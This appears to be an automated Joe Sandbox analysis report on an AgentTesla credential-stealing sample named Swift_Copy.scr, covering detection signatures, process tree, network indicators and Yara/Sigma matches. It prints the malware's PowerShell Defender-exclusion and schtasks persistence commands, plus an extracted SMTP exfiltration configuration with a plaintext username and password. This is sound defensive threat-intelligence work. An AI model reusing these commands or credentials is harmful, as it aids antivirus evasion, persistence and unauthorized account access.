Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swift_Copy.scr

Overview

General Information

Sample name:Swift_Copy.scr
Analysis ID:1430207
MD5:a474ccda551682dcb92efe1402dd02cb
SHA1:6a147a094a142d0ddf04c97b6b74626be611c189
SHA256:1680d6ff15e6c5b4a4098b88073646bb4cff58b6c51a916bed32401b02a64a6b
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Swift_Copy.scr (PID: 4592 cmdline: "C:\Users\user\Desktop\Swift_Copy.scr" /S MD5: A474CCDA551682DCB92EFE1402DD02CB)
    • powershell.exe (PID: 4436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6588 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3628 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • WAuLmtFUmD.exe (PID: 5960 cmdline: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe MD5: A474CCDA551682DCB92EFE1402DD02CB)
    • schtasks.exe (PID: 2504 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 1276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.sigmamotorspk.com", "Username": "khiro@sigmamotorspk.com", "Password": "zarbeazab1234"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3276330521.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.2118653417.00000000028FE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000C.00000002.3276330521.0000000002E37000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.WAuLmtFUmD.exe.50a5450.11.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.WAuLmtFUmD.exe.50a5450.11.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                8.2.WAuLmtFUmD.exe.50a5450.11.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x316f3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x31765:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x317ef:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x31881:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x318eb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3195d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x319f3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31a83:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                8.2.WAuLmtFUmD.exe.506aa30.9.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  8.2.WAuLmtFUmD.exe.506aa30.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 22 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift_Copy.scr" /S, ParentImage: C:\Users\user\Desktop\Swift_Copy.scr, ParentProcessId: 4592, ParentProcessName: Swift_Copy.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", ProcessId: 4436, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift_Copy.scr" /S, ParentImage: C:\Users\user\Desktop\Swift_Copy.scr, ParentProcessId: 4592, ParentProcessName: Swift_Copy.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", ProcessId: 4436, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe, ParentImage: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe, ParentProcessId: 5960, ParentProcessName: WAuLmtFUmD.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp", ProcessId: 2504, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 65.21.71.87, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5948, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49709
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift_Copy.scr" /S, ParentImage: C:\Users\user\Desktop\Swift_Copy.scr, ParentProcessId: 4592, ParentProcessName: Swift_Copy.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", ProcessId: 3628, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift_Copy.scr" /S, ParentImage: C:\Users\user\Desktop\Swift_Copy.scr, ParentProcessId: 4592, ParentProcessName: Swift_Copy.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", ProcessId: 4436, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift_Copy.scr" /S, ParentImage: C:\Users\user\Desktop\Swift_Copy.scr, ParentProcessId: 4592, ParentProcessName: Swift_Copy.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", ProcessId: 3628, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.sigmamotorspk.com", "Username": "khiro@sigmamotorspk.com", "Password": "zarbeazab1234"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeReversingLabs: Detection: 70%
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeVirustotal: Detection: 45%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: Swift_Copy.scrVirustotal: Detection: 45%Perma Link
                    Source: Swift_Copy.scrReversingLabs: Detection: 70%
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Swift_Copy.scrJoe Sandbox ML: detected
                    Source: Swift_Copy.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Swift_Copy.scrStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 4x nop then jmp 0AB1151Fh0_2_0AB10CB4
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 4x nop then jmp 0EFF0C6Fh8_2_0EFF03FD
                    Source: global trafficTCP traffic: 192.168.2.5:49709 -> 65.21.71.87:587
                    Source: global trafficTCP traffic: 192.168.2.5:49709 -> 65.21.71.87:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownDNS traffic detected: queries for: mail.sigmamotorspk.com
                    Source: Swift_Copy.scr, WAuLmtFUmD.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: Swift_Copy.scr, WAuLmtFUmD.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: RegSvcs.exe, 00000007.00000002.2118653417.0000000002906000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3276330521.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.sigmamotorspk.com
                    Source: Swift_Copy.scr, WAuLmtFUmD.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: Swift_Copy.scr, 00000000.00000002.2106668901.00000000033F6000.00000004.00000800.00020000.00000000.sdmp, WAuLmtFUmD.exe, 00000008.00000002.2135864386.00000000035B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000007.00000002.2118653417.0000000002906000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3276330521.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sigmamotorspk.com
                    Source: Swift_Copy.scr, 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WAuLmtFUmD.exe, 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Swift_Copy.scr, WAuLmtFUmD.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, NDL2m67zO.cs.Net Code: tKj

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 8.2.WAuLmtFUmD.exe.50a5450.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.WAuLmtFUmD.exe.506aa30.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Swift_Copy.scr.44510c0.10.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Swift_Copy.scr.44166a0.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Swift_Copy.scr.44166a0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.WAuLmtFUmD.exe.506aa30.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: Swift_Copy.scr, Program.csLarge array initialization: : array initializer size 623286
                    Source: 0.2.Swift_Copy.scr.5f50000.11.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_018ED93C0_2_018ED93C
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_0766D4600_2_0766D460
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_0766C4C80_2_0766C4C8
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_0766C4B80_2_0766C4B8
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_0766CE680_2_0766CE68
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_0766CE780_2_0766CE78
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_07661EC00_2_07661EC0
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_07661EAF0_2_07661EAF
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_07663E980_2_07663E98
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_0766ACC80_2_0766ACC8
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_07667B900_2_07667B90
                    Source: C:\Users\user\Desktop\Swift_Copy.scrCode function: 0_2_0AB12BE00_2_0AB12BE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00DF93787_2_00DF9378
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00DF4A987_2_00DF4A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00DF9BF87_2_00DF9BF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00DFCEC07_2_00DFCEC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00DF3E807_2_00DF3E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00DF41C87_2_00DF41C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05DD56F87_2_05DD56F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05DD00407_2_05DD0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05DDBD187_2_05DDBD18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05DDDD387_2_05DDDD38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05DD8C047_2_05DD8C04
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05DD3F687_2_05DD3F68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05DD2AF87_2_05DD2AF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05DD9AF87_2_05DD9AF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05DD50187_2_05DD5018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05DD32687_2_05DD3268
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00DFE06F7_2_00DFE06F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00DF9BF37_2_00DF9BF3
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0154D93C8_2_0154D93C
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_058411048_2_05841104
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_05841E408_2_05841E40
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0788A7508_2_0788A750
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0788C3988_2_0788C398
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0788D3308_2_0788D330
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_07883E988_2_07883E98
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_07881EAF8_2_07881EAF
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_07881EC08_2_07881EC0
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0788CD488_2_0788CD48
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0788AB988_2_0788AB98
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_07887B908_2_07887B90
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0EFF24708_2_0EFF2470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0122937812_2_01229378
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01229B3812_2_01229B38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01224A9812_2_01224A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01223E8012_2_01223E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0122CEC012_2_0122CEC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012241C812_2_012241C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_062C56F812_2_062C56F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_062C3F6812_2_062C3F68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_062C8C0412_2_062C8C04
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_062CDD3812_2_062CDD38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_062C2AF812_2_062C2AF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_062C9AF812_2_062C9AF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_062C004012_2_062C0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_062CBFD812_2_062CBFD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_062C326812_2_062C3268
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_062C501812_2_062C5018
                    Source: Swift_Copy.scrStatic PE information: invalid certificate
                    Source: Swift_Copy.scr, 00000000.00000002.2108100860.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Swift_Copy.scr
                    Source: Swift_Copy.scr, 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamee4a58f0f-9f80-4bf8-83da-c8b835e59bd6.exe4 vs Swift_Copy.scr
                    Source: Swift_Copy.scr, 00000000.00000002.2105660594.000000000167E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Swift_Copy.scr
                    Source: Swift_Copy.scr, 00000000.00000002.2106668901.00000000033B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Swift_Copy.scr
                    Source: Swift_Copy.scr, 00000000.00000002.2110825783.0000000005F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Swift_Copy.scr
                    Source: Swift_Copy.scr, 00000000.00000002.2106668901.00000000033F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamee4a58f0f-9f80-4bf8-83da-c8b835e59bd6.exe4 vs Swift_Copy.scr
                    Source: Swift_Copy.scr, 00000000.00000002.2112955026.000000000BBD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Swift_Copy.scr
                    Source: Swift_Copy.scrBinary or memory string: OriginalFilenameDwip.exeL vs Swift_Copy.scr
                    Source: Swift_Copy.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 8.2.WAuLmtFUmD.exe.50a5450.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.WAuLmtFUmD.exe.506aa30.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
